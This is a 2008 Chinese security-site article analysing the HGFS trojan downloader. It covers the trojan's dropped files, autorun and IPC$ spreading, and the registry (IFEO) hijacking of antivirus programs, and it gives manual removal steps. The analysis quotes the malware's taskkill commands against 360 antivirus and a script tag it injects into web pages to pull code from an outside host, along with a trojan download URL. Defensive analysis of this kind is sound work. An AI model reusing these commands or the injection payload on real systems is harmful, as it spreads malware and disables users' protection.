登录论坛 | 注册会员 设为首页 | 收藏本站
当前位置 : 首页>软件学院>网络技术>黑客攻防>正文
 
HGFS木马下载器的手动查杀

http://www.dbit.cn 2008-5-7 8:37:05  来源:BBS  编辑:叶子
 

这是一个具有感染脚本功能和局域网传播功能的木马下载器

样本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行

2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘 复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网,如果是则利用ipc漏洞建立一个空连接,并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe

5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效

解决方法:

到down.45it.com下载sreng和Xdelbox

1.复制如下文字 到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe


打开Xdelbox.exe
在下面的大框中 单击右键 点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键 点击 “立即重启执行删除”
软件会自动重启计算机

重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管,它会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后他会自动重启进入正常模式

2.打开sreng 启动项目 注册表
删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站

 
收藏】【打印】【进入论坛
  相关文章:

 
 
 
 
最新文章

中关村艳照门女主角详记录高清组图 
大连护士门大尺度艳照高清组图
iPhone女孩微博爆红 最宝贵东西换iPhon
反恐精英之父内维尔:改变电脑游戏销售
团购网站黎明之前:中国市场惨烈厮杀不
团购鼻祖Groupon中国揭秘:快与慢的商业
Spil Games发布新的品牌形象
1800配置一台主机 不要显示器
联想V360笔记本模特写真
爱国者第四代移动硬盘将面市、低电压保

 
推荐文章
1
2
3
4
5
6
7
8
9
10
iPhone女孩微博爆红 最宝贵东西换
大连护士门大尺度艳照高清组图
中关村艳照门女主角详记录高清组
苹果员工中毒门
宫如敏不雅照疯传 看张馨予韩一菲
深耕市场 永续经营——专访百脑汇
优派专业电子书 让您回家旅途多姿
揭晓百万大奖三星bada魅力绽放中
大明龙权“江湖英雄会”全国PK大
永恒之塔校园达人挑战赛完美落幕
八卦图解 More>>
iPhone女孩微博爆红 最宝贵东西换 大连护士门大尺度艳照高清组图
中关村艳照门女主角详记录高清组 宫如敏不雅照疯传 看张馨予韩一菲